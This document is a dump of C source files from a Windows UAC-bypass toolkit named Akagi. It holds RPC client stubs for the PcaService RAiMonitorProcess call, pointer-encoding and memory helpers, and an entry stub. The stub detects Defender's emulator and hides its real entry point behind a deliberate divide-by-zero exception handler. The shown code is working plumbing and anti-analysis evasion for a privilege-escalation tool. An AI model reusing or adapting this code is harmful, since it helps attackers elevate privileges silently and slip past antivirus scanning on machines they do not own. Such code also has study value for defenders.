#endif /* __PcaService7_INTERFACE_DEFINED__ */
/* Additional Prototypes for ALL interfaces */
/* end of Additional Prototypes */
#ifdef __cplusplus
}
#endif
#endif
================================================
FILE: Source/Akagi/pcasvc/w8_10/pcasvc.acf
================================================
[
explicit_handle
]
interface PcaService
{
RAiMonitorProcess();
}
================================================
FILE: Source/Akagi/pcasvc/w8_10/pcasvc.idl
================================================
[
uuid(0767a036-0d22-48aa-ba69-b619480f38cb),
version(1.0),
]
interface PcaService
{
long RAiMonitorProcess(
handle_t bindingHandle,
[in]unsigned __int3264 hProcess,
[in]long unknown0,
[in][unique][string]wchar_t* exeFileName,
[in][unique][string]wchar_t* cmdLine,
[in][unique][string]wchar_t* workingDir,
[in]long flags
);
}
================================================
FILE: Source/Akagi/pcasvc/w8_10/x64/pcasvc64.c
================================================
/*
File has been edited after MIDL compiler, changes:
1. XCFG BS removed
2. Warning supression added
*/
/* File created by MIDL compiler version 8.01.0626 */
/* at Mon Jan 18 19:14:07 2038
*/
/* Compiler settings for pcasvc.idl:
Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626
protocol : dce , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
#if defined(_M_AMD64)
#pragma warning( disable: 4049 ) /* more than 64k source lines */
#if _MSC_VER >= 1200
#pragma warning(push)
#endif
#pragma warning( disable: 4211 ) /* redefine extern to static */
#pragma warning( disable: 4232 ) /* dllimport identity*/
#pragma warning( disable: 4024 ) /* array to pointer mapping*/
#include
#include "pcasvc64.h"
#define TYPE_FORMAT_STRING_SIZE 7
#define PROC_FORMAT_STRING_SIZE 73
#define EXPR_FORMAT_STRING_SIZE 1
#define TRANSMIT_AS_TABLE_SIZE 0
#define WIRE_MARSHAL_TABLE_SIZE 0
typedef struct _pcasvc_MIDL_TYPE_FORMAT_STRING
{
short Pad;
unsigned char Format[ TYPE_FORMAT_STRING_SIZE ];
} pcasvc_MIDL_TYPE_FORMAT_STRING;
typedef struct _pcasvc_MIDL_PROC_FORMAT_STRING
{
short Pad;
unsigned char Format[ PROC_FORMAT_STRING_SIZE ];
} pcasvc_MIDL_PROC_FORMAT_STRING;
typedef struct _pcasvc_MIDL_EXPR_FORMAT_STRING
{
long Pad;
unsigned char Format[ EXPR_FORMAT_STRING_SIZE ];
} pcasvc_MIDL_EXPR_FORMAT_STRING;
static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax =
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};
extern const pcasvc_MIDL_TYPE_FORMAT_STRING pcasvc__MIDL_TypeFormatString;
extern const pcasvc_MIDL_PROC_FORMAT_STRING pcasvc__MIDL_ProcFormatString;
extern const pcasvc_MIDL_EXPR_FORMAT_STRING pcasvc__MIDL_ExprFormatString;
#define GENERIC_BINDING_TABLE_SIZE 0
/* Standard interface: PcaService, ver. 1.0,
GUID={0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}} */
static const RPC_CLIENT_INTERFACE PcaService___RpcClientInterface =
{
sizeof(RPC_CLIENT_INTERFACE),
{{0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}},{1,0}},
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
0,
0,
0,
0,
0,
0x00000000
};
RPC_IF_HANDLE PcaService_v1_0_c_ifspec = (RPC_IF_HANDLE)& PcaService___RpcClientInterface;
extern const MIDL_STUB_DESC PcaService_StubDesc;
static RPC_BINDING_HANDLE PcaService__MIDL_AutoBindHandle;
long RAiMonitorProcess(
handle_t bindingHandle,
/* [in] */ unsigned __int3264 hProcess,
/* [in] */ long unknown0,
/* [string][unique][in] */ wchar_t *exeFileName,
/* [string][unique][in] */ wchar_t *cmdLine,
/* [string][unique][in] */ wchar_t *workingDir,
/* [in] */ long flags)
{
CLIENT_CALL_RETURN _RetVal;
_RetVal = NdrClientCall2(
( PMIDL_STUB_DESC )&PcaService_StubDesc,
(PFORMAT_STRING) &pcasvc__MIDL_ProcFormatString.Format[0],
bindingHandle,
hProcess,
unknown0,
exeFileName,
cmdLine,
workingDir,
flags);
return ( long )_RetVal.Simple;
}
#if !defined(__RPC_WIN64__)
#error Invalid build platform for this stub.
#endif
static const pcasvc_MIDL_PROC_FORMAT_STRING pcasvc__MIDL_ProcFormatString =
{
0,
{
/* Procedure RAiMonitorProcess */
0x0, /* 0 */
0x48, /* Old Flags: */
/* 2 */ NdrFcLong( 0x0 ), /* 0 */
/* 6 */ NdrFcShort( 0x0 ), /* 0 */
/* 8 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */
/* 10 */ 0x32, /* FC_BIND_PRIMITIVE */
0x0, /* 0 */
/* 12 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */
/* 14 */ NdrFcShort( 0x18 ), /* 24 */
/* 16 */ NdrFcShort( 0x8 ), /* 8 */
/* 18 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */
0x7, /* 7 */
/* 20 */ 0xa, /* 10 */
0x1, /* Ext Flags: new corr desc, */
/* 22 */ NdrFcShort( 0x0 ), /* 0 */
/* 24 */ NdrFcShort( 0x0 ), /* 0 */
/* 26 */ NdrFcShort( 0x0 ), /* 0 */
/* 28 */ NdrFcShort( 0x0 ), /* 0 */
/* Parameter hProcess */
/* 30 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 32 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */
/* 34 */ 0xb9, /* FC_UINT3264 */
0x0, /* 0 */
/* Parameter unknown0 */
/* 36 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 38 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */
/* 40 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter exeFileName */
/* 42 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */
/* 44 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */
/* 46 */ NdrFcShort( 0x2 ), /* Type Offset=2 */
/* Parameter cmdLine */
/* 48 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */
/* 50 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */
/* 52 */ NdrFcShort( 0x2 ), /* Type Offset=2 */
/* Parameter workingDir */
/* 54 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */
/* 56 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */
/* 58 */ NdrFcShort( 0x2 ), /* Type Offset=2 */
/* Parameter flags */
/* 60 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 62 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */
/* 64 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Return value */
/* 66 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */
/* 68 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */
/* 70 */ 0x8, /* FC_LONG */
0x0, /* 0 */
0x0
}
};
static const pcasvc_MIDL_TYPE_FORMAT_STRING pcasvc__MIDL_TypeFormatString =
{
0,
{
NdrFcShort( 0x0 ), /* 0 */
/* 2 */
0x12, 0x8, /* FC_UP [simple_pointer] */
/* 4 */
0x25, /* FC_C_WSTRING */
0x5c, /* FC_PAD */
0x0
}
};
static const unsigned short PcaService_FormatStringOffsetTable[] =
{
0
};
static const MIDL_STUB_DESC PcaService_StubDesc =
{
(void *)& PcaService___RpcClientInterface,
MIDL_user_allocate,
MIDL_user_free,
&PcaService__MIDL_AutoBindHandle,
0,
0,
0,
0,
pcasvc__MIDL_TypeFormatString.Format,
1, /* -error bounds_check flag */
0x50002, /* Ndr library version */
0,
0x8010272, /* MIDL Version 8.1.626 */
0,
0,
0, /* notify & notify_flag routine table */
0x1, /* MIDL flag */
0, /* cs routines */
0, /* proxy/server info */
0
};
#if _MSC_VER >= 1200
#pragma warning(pop)
#endif
#else
#pragma warning(disable:4206)
#endif /* defined(_M_AMD64)*/
================================================
FILE: Source/Akagi/pcasvc/w8_10/x64/pcasvc64.h
================================================
/* this ALWAYS GENERATED file contains the definitions for the interfaces */
/* File created by MIDL compiler version 8.01.0626 */
/* at Mon Jan 18 19:14:07 2038
*/
/* Compiler settings for pcasvc.idl:
Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626
protocol : dce , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
#pragma warning( disable: 4049 ) /* more than 64k source lines */
/* verify that the version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 475
#endif
#include "rpc.h"
#include "rpcndr.h"
#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of
#endif /* __RPCNDR_H_VERSION__ */
#ifndef __pcasvc64_h__
#define __pcasvc64_h__
#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif
#ifndef DECLSPEC_XFGVIRT
#if _CONTROL_FLOW_GUARD_XFG
#define DECLSPEC_XFGVIRT(base, func) __declspec(xfg_virtual(base, func))
#else
#define DECLSPEC_XFGVIRT(base, func)
#endif
#endif
/* Forward Declarations */
#ifdef __cplusplus
extern "C"{
#endif
#ifndef __PcaService_INTERFACE_DEFINED__
#define __PcaService_INTERFACE_DEFINED__
/* interface PcaService */
/* [explicit_handle][version][uuid] */
long RAiMonitorProcess(
handle_t bindingHandle,
/* [in] */ unsigned __int3264 hProcess,
/* [in] */ long unknown0,
/* [string][unique][in] */ wchar_t *exeFileName,
/* [string][unique][in] */ wchar_t *cmdLine,
/* [string][unique][in] */ wchar_t *workingDir,
/* [in] */ long flags);
extern RPC_IF_HANDLE PcaService_v1_0_c_ifspec;
extern RPC_IF_HANDLE PcaService_v1_0_s_ifspec;
#endif /* __PcaService_INTERFACE_DEFINED__ */
/* Additional Prototypes for ALL interfaces */
/* end of Additional Prototypes */
#ifdef __cplusplus
}
#endif
#endif
================================================
FILE: Source/Akagi/pcasvc/w8_10/x86-32/pcasvc32.c
================================================
/*
File has been edited after MIDL compiler, changes:
1. XCFG BS removed
2. Warning supression added
*/
/* File created by MIDL compiler version 8.01.0626 */
/* at Mon Jan 18 19:14:07 2038
*/
/* Compiler settings for pcasvc.idl:
Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0626
protocol : dce , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
#if !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_)
#pragma warning( disable: 4049 ) /* more than 64k source lines */
#if _MSC_VER >= 1200
#pragma warning(push)
#endif
#pragma warning( disable: 4211 ) /* redefine extern to static */
#pragma warning( disable: 4232 ) /* dllimport identity*/
#pragma warning( disable: 4024 ) /* array to pointer mapping*/
#pragma warning( disable: 4100 ) /* unreferenced arguments in x86 call */
#pragma optimize("", off )
#include
#include "pcasvc32.h"
#define TYPE_FORMAT_STRING_SIZE 7
#define PROC_FORMAT_STRING_SIZE 71
#define EXPR_FORMAT_STRING_SIZE 1
#define TRANSMIT_AS_TABLE_SIZE 0
#define WIRE_MARSHAL_TABLE_SIZE 0
typedef struct _pcasvc_MIDL_TYPE_FORMAT_STRING
{
short Pad;
unsigned char Format[ TYPE_FORMAT_STRING_SIZE ];
} pcasvc_MIDL_TYPE_FORMAT_STRING;
typedef struct _pcasvc_MIDL_PROC_FORMAT_STRING
{
short Pad;
unsigned char Format[ PROC_FORMAT_STRING_SIZE ];
} pcasvc_MIDL_PROC_FORMAT_STRING;
typedef struct _pcasvc_MIDL_EXPR_FORMAT_STRING
{
long Pad;
unsigned char Format[ EXPR_FORMAT_STRING_SIZE ];
} pcasvc_MIDL_EXPR_FORMAT_STRING;
static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax =
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};
extern const pcasvc_MIDL_TYPE_FORMAT_STRING pcasvc__MIDL_TypeFormatString;
extern const pcasvc_MIDL_PROC_FORMAT_STRING pcasvc__MIDL_ProcFormatString;
extern const pcasvc_MIDL_EXPR_FORMAT_STRING pcasvc__MIDL_ExprFormatString;
#define GENERIC_BINDING_TABLE_SIZE 0
/* Standard interface: PcaService, ver. 1.0,
GUID={0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}} */
static const RPC_CLIENT_INTERFACE PcaService___RpcClientInterface =
{
sizeof(RPC_CLIENT_INTERFACE),
{{0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}},{1,0}},
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
0,
0,
0,
0,
0,
0x00000000
};
RPC_IF_HANDLE PcaService_v1_0_c_ifspec = (RPC_IF_HANDLE)& PcaService___RpcClientInterface;
extern const MIDL_STUB_DESC PcaService_StubDesc;
static RPC_BINDING_HANDLE PcaService__MIDL_AutoBindHandle;
long RAiMonitorProcess(
handle_t bindingHandle,
/* [in] */ unsigned __int3264 hProcess,
/* [in] */ long unknown0,
/* [string][unique][in] */ wchar_t *exeFileName,
/* [string][unique][in] */ wchar_t *cmdLine,
/* [string][unique][in] */ wchar_t *workingDir,
/* [in] */ long flags)
{
CLIENT_CALL_RETURN _RetVal;
_RetVal = NdrClientCall2(
( PMIDL_STUB_DESC )&PcaService_StubDesc,
(PFORMAT_STRING) &pcasvc__MIDL_ProcFormatString.Format[0],
( unsigned char * )&bindingHandle);
return ( long )_RetVal.Simple;
}
#if !defined(__RPC_WIN32__)
#error Invalid build platform for this stub.
#endif
#if !(TARGET_IS_NT50_OR_LATER)
#error You need Windows 2000 or later to run this stub because it uses these features:
#error /robust command line switch.
#error However, your C/C++ compilation flags indicate you intend to run this app on earlier systems.
#error This app will fail with the RPC_X_WRONG_STUB_VERSION error.
#endif
static const pcasvc_MIDL_PROC_FORMAT_STRING pcasvc__MIDL_ProcFormatString =
{
0,
{
/* Procedure RAiMonitorProcess */
0x0, /* 0 */
0x48, /* Old Flags: */
/* 2 */ NdrFcLong( 0x0 ), /* 0 */
/* 6 */ NdrFcShort( 0x0 ), /* 0 */
/* 8 */ NdrFcShort( 0x20 ), /* x86 Stack size/offset = 32 */
/* 10 */ 0x32, /* FC_BIND_PRIMITIVE */
0x0, /* 0 */
/* 12 */ NdrFcShort( 0x0 ), /* x86 Stack size/offset = 0 */
/* 14 */ NdrFcShort( 0x18 ), /* 24 */
/* 16 */ NdrFcShort( 0x8 ), /* 8 */
/* 18 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */
0x7, /* 7 */
/* 20 */ 0x8, /* 8 */
0x1, /* Ext Flags: new corr desc, */
/* 22 */ NdrFcShort( 0x0 ), /* 0 */
/* 24 */ NdrFcShort( 0x0 ), /* 0 */
/* 26 */ NdrFcShort( 0x0 ), /* 0 */
/* Parameter hProcess */
/* 28 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 30 */ NdrFcShort( 0x4 ), /* x86 Stack size/offset = 4 */
/* 32 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter unknown0 */
/* 34 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 36 */ NdrFcShort( 0x8 ), /* x86 Stack size/offset = 8 */
/* 38 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter exeFileName */
/* 40 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */
/* 42 */ NdrFcShort( 0xc ), /* x86 Stack size/offset = 12 */
/* 44 */ NdrFcShort( 0x2 ), /* Type Offset=2 */
/* Parameter cmdLine */
/* 46 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */
/* 48 */ NdrFcShort( 0x10 ), /* x86 Stack size/offset = 16 */
/* 50 */ NdrFcShort( 0x2 ), /* Type Offset=2 */
/* Parameter workingDir */
/* 52 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */
/* 54 */ NdrFcShort( 0x14 ), /* x86 Stack size/offset = 20 */
/* 56 */ NdrFcShort( 0x2 ), /* Type Offset=2 */
/* Parameter flags */
/* 58 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 60 */ NdrFcShort( 0x18 ), /* x86 Stack size/offset = 24 */
/* 62 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Return value */
/* 64 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */
/* 66 */ NdrFcShort( 0x1c ), /* x86 Stack size/offset = 28 */
/* 68 */ 0x8, /* FC_LONG */
0x0, /* 0 */
0x0
}
};
static const pcasvc_MIDL_TYPE_FORMAT_STRING pcasvc__MIDL_TypeFormatString =
{
0,
{
NdrFcShort( 0x0 ), /* 0 */
/* 2 */
0x12, 0x8, /* FC_UP [simple_pointer] */
/* 4 */
0x25, /* FC_C_WSTRING */
0x5c, /* FC_PAD */
0x0
}
};
static const unsigned short PcaService_FormatStringOffsetTable[] =
{
0
};
static const MIDL_STUB_DESC PcaService_StubDesc =
{
(void *)& PcaService___RpcClientInterface,
MIDL_user_allocate,
MIDL_user_free,
&PcaService__MIDL_AutoBindHandle,
0,
0,
0,
0,
pcasvc__MIDL_TypeFormatString.Format,
1, /* -error bounds_check flag */
0x50002, /* Ndr library version */
0,
0x8010272, /* MIDL Version 8.1.626 */
0,
0,
0, /* notify & notify_flag routine table */
0x1, /* MIDL flag */
0, /* cs routines */
0, /* proxy/server info */
0
};
#if _MSC_VER >= 1200
#pragma warning(pop)
#endif
#else
#pragma warning(disable:4206)
#endif /* !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_) */
================================================
FILE: Source/Akagi/pcasvc/w8_10/x86-32/pcasvc32.h
================================================
/* this ALWAYS GENERATED file contains the definitions for the interfaces */
/* File created by MIDL compiler version 8.01.0626 */
/* at Mon Jan 18 19:14:07 2038
*/
/* Compiler settings for pcasvc.idl:
Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0626
protocol : dce , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
#pragma warning( disable: 4049 ) /* more than 64k source lines */
/* verify that the version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 475
#endif
#include "rpc.h"
#include "rpcndr.h"
#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of
#endif /* __RPCNDR_H_VERSION__ */
#ifndef __pcasvc32_h__
#define __pcasvc32_h__
#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif
#ifndef DECLSPEC_XFGVIRT
#if _CONTROL_FLOW_GUARD_XFG
#define DECLSPEC_XFGVIRT(base, func) __declspec(xfg_virtual(base, func))
#else
#define DECLSPEC_XFGVIRT(base, func)
#endif
#endif
/* Forward Declarations */
#ifdef __cplusplus
extern "C"{
#endif
#ifndef __PcaService_INTERFACE_DEFINED__
#define __PcaService_INTERFACE_DEFINED__
/* interface PcaService */
/* [explicit_handle][version][uuid] */
long RAiMonitorProcess(
handle_t bindingHandle,
/* [in] */ unsigned __int3264 hProcess,
/* [in] */ long unknown0,
/* [string][unique][in] */ wchar_t *exeFileName,
/* [string][unique][in] */ wchar_t *cmdLine,
/* [string][unique][in] */ wchar_t *workingDir,
/* [in] */ long flags);
extern RPC_IF_HANDLE PcaService_v1_0_c_ifspec;
extern RPC_IF_HANDLE PcaService_v1_0_s_ifspec;
#endif /* __PcaService_INTERFACE_DEFINED__ */
/* Additional Prototypes for ALL interfaces */
/* end of Additional Prototypes */
#ifdef __cplusplus
}
#endif
#endif
================================================
FILE: Source/Akagi/stub.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2018 - 2022
*
* TITLE: STUB.C
*
* VERSION: 3.62
*
* DATE: 08 Jul 2022
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
TEB_ACTIVE_FRAME_CONTEXT g_fctx = { 0, "(*^-^*)" };
/*
* ucmSehHandler
*
* Purpose:
*
* Program entry point seh handler, indirect control passing.
*
*/
INT ucmSehHandler(
_In_ UINT ExceptionCode,
_In_ EXCEPTION_POINTERS* ExceptionInfo
)
{
UACME_THREAD_CONTEXT* uctx;
UNREFERENCED_PARAMETER(ExceptionInfo);
if (ExceptionCode == STATUS_INTEGER_DIVIDE_BY_ZERO) {
uctx = (UACME_THREAD_CONTEXT*)RtlGetFrame();
while ((uctx != NULL) && (uctx->Frame.Context != &g_fctx)) {
uctx = (UACME_THREAD_CONTEXT*)uctx->Frame.Previous;
}
if (uctx) {
if (uctx->ucmMain) {
uctx->ucmMain = (pfnEntryPoint)supDecodePointer(uctx->ucmMain);
uctx->ReturnedResult = uctx->ucmMain(UacMethodInvalid,
NULL,
0);
}
}
return EXCEPTION_EXECUTE_HANDLER;
}
return EXCEPTION_CONTINUE_SEARCH;
}
DWORD StubInit(
_In_ PVOID EntryPoint)
{
int v = 1, d = 0;
UACME_THREAD_CONTEXT uctx;
RtlSecureZeroMemory(&uctx, sizeof(uctx));
if (wdIsEmulatorPresent() == STATUS_NOT_SUPPORTED) {
uctx.Frame.Context = &g_fctx;
uctx.ucmMain = (pfnEntryPoint)supEncodePointer(EntryPoint);
RtlPushFrame((PTEB_ACTIVE_FRAME)&uctx);
__try {
v = (int)USER_SHARED_DATA->NtProductType;
d = (int)USER_SHARED_DATA->AlternativeArchitecture;
v = (int)(v / d);
}
__except (ucmSehHandler(GetExceptionCode(), GetExceptionInformation())) {
v = 1;
}
RtlPopFrame((PTEB_ACTIVE_FRAME)&uctx);
}
if (v)
return uctx.ReturnedResult;
else
return (DWORD)STATUS_ACCESS_DENIED;
}
================================================
FILE: Source/Akagi/stub.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2018 - 2022
*
* TITLE: STUB.H
*
* VERSION: 3.59
*
* DATE: 02 Feb 2022
*
* Kuma stub header file
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
DWORD StubInit(_In_ PVOID EntryPoint);
================================================
FILE: Source/Akagi/sup.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2026
*
* TITLE: SUP.C
*
* VERSION: 3.69
*
* DATE: 12 Feb 2026
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
#include "uas.h"
//
// Signatures array.
//
USER_ASSOC_SIGNATURE* g_UserAssocSignatures[] = {
&UAS_SIG_7601,
&UAS_SIG_9600,
&UAS_SIG_14393,
&UAS_SIG_17763,
&UAS_SIG_18362,
&UAS_SIG_18363,
&UAS_SIG_19041,
&UAS_SIG_19042_19043,
&UAS_SIG_22000,
&UAS_SIG_22621,
&UAS_SIG_26100
};
#if defined(__cplusplus)
extern "C" {
#endif
_Must_inspect_result_
_Ret_maybenull_ _Post_writable_byte_size_(size)
void* __RPC_USER MIDL_user_allocate(_In_ size_t size)
{
return((void __RPC_FAR*) supHeapAlloc(size));
}
#pragma warning(push)
#pragma warning(disable: 6387)
#pragma warning(disable: 6001)
void __RPC_USER MIDL_user_free(_Pre_maybenull_ _Post_invalid_ void* p)
{
supHeapFree(p);
}
#pragma warning(pop)
#if defined(__cplusplus)
}
#endif
/*
* supEncodePointer
*
* Purpose:
*
* Encodes the specified pointer.
*
*/
PVOID supEncodePointer(
_In_ PVOID Pointer)
{
NTSTATUS Status;
ULONG Cookie, retLength;
if ((g_ctx == NULL) || (g_ctx->Cookie == 0)) {
Status = NtQueryInformationProcess(
NtCurrentProcess(),
ProcessCookie,
&Cookie,
sizeof(ULONG),
&retLength);
if (!NT_SUCCESS(Status))
RtlRaiseStatus(Status);
if (g_ctx)
g_ctx->Cookie = Cookie;
}
else {
Cookie = g_ctx->Cookie;
}
#ifdef _WIN64
return (PVOID)(RotateRight64(
(ULONG_PTR)Pointer ^ Cookie,
Cookie & 0x3f));
#else
return (PVOID)(RotateRight32(
(ULONG_PTR)Pointer ^ Cookie,
Cookie & 0x1f));
#endif
}
/*
* supDecodePointer
*
* Purpose:
*
* Decodes the specified pointer.
*
*/
PVOID supDecodePointer(
_In_ PVOID Pointer)
{
NTSTATUS Status;
ULONG Cookie, retLength;
if ((g_ctx == NULL) || (g_ctx->Cookie == 0)) {
Status = NtQueryInformationProcess(
NtCurrentProcess(),
ProcessCookie,
&Cookie,
sizeof(ULONG),
&retLength);
if (!NT_SUCCESS(Status))
RtlRaiseStatus(Status);
if (g_ctx)
g_ctx->Cookie = Cookie;
}
else {
Cookie = g_ctx->Cookie;
}
#ifdef _WIN64
return (PVOID)(RotateRight64(
(ULONG_PTR)Pointer,
0x40 - (Cookie & 0x3f)) ^ Cookie);
#else
return (PVOID)(RotateRight32(
(ULONG_PTR)Pointer,
0x20 - (Cookie & 0x1f)) ^ Cookie);
#endif
}
/*
* supVirtualAlloc
*
* Purpose:
*
* Wrapper for NtAllocateVirtualMemory.
*
*/
PVOID supVirtualAlloc(
_Inout_ PSIZE_T Size,
_In_ ULONG AllocationType,
_In_ ULONG Protect,
_Out_opt_ NTSTATUS* Status)
{
NTSTATUS status;
PVOID Buffer = NULL;
SIZE_T size;
size = *Size;
status = NtAllocateVirtualMemory(
NtCurrentProcess(),
&Buffer,
0,
&size,
AllocationType,
Protect);
if (NT_SUCCESS(status)) {
RtlSecureZeroMemory(Buffer, size);
}
*Size = size;
if (Status) *Status = status;
return Buffer;
}
/*
* supVirtualFree
*
* Purpose:
*
* Wrapper for NtFreeVirtualMemory.
*
*/
BOOL supVirtualFree(
_In_ PVOID Memory,
_Out_opt_ NTSTATUS* Status)
{
NTSTATUS status = STATUS_UNSUCCESSFUL;
SIZE_T size = 0;
status = NtFreeVirtualMemory(
NtCurrentProcess(),
&Memory,
&size,
MEM_RELEASE);
if (Status) *Status = status;
return NT_SUCCESS(status);
}
/*
* supSecureVirtualFree
*
* Purpose:
*
* Wrapper for NtFreeVirtualMemory.
*
*/
BOOL supSecureVirtualFree(
_In_ PVOID Memory,
_In_ SIZE_T MemorySize,
_Out_opt_ NTSTATUS* Status)
{
RtlSecureZeroMemory(Memory, MemorySize);
return supVirtualFree(Memory, Status);
}
/*
* supHeapAlloc
*
* Purpose:
*
* Wrapper for RtlAllocateHeap with ucmHeap.
*
*/
PVOID FORCEINLINE supHeapAlloc(
_In_ SIZE_T Size)
{
return RtlAllocateHeap(g_ctx->ucmHeap, HEAP_ZERO_MEMORY, Size);
}
/*
* supHeapFree
*
* Purpose:
*
* Wrapper for RtlFreeHeap with ucmHeap.
*
*/
BOOL FORCEINLINE supHeapFree(
_In_ PVOID Memory)
{
return RtlFreeHeap(g_ctx->ucmHeap, 0, Memory);
}
/*
* supIsProcess32bit
*
* Purpose:
*
* Return TRUE if given process is under WOW64, FALSE otherwise.
*
*/
BOOLEAN supIsProcess32bit(
_In_ HANDLE hProcess
)
{
NTSTATUS status;
PROCESS_EXTENDED_BASIC_INFORMATION pebi;
if (hProcess == NULL) {
return FALSE;
}
//query if this is wow64 process
RtlSecureZeroMemory(&pebi, sizeof(pebi));
pebi.Size = sizeof(PROCESS_EXTENDED_BASIC_INFORMATION);
status = NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pebi, sizeof(pebi), NULL);
if (NT_SUCCESS(status)) {
return (pebi.IsWow64Process == 1);
}
return FALSE;
}
/*
* supGetElevationType
*
* Purpose:
*
* Returns client elevation type.
*
*/
BOOL supGetElevationType(
_Out_ TOKEN_ELEVATION_TYPE* lpType
)
{
HANDLE hToken = NULL;
NTSTATUS status;
ULONG bytesRead = 0;
TOKEN_ELEVATION_TYPE TokenType = TokenElevationTypeDefault;
status = NtOpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken);
if (NT_SUCCESS(status)) {
status = NtQueryInformationToken(hToken, TokenElevationType, &TokenType,
sizeof(TOKEN_ELEVATION_TYPE), &bytesRead);
NtClose(hToken);
}
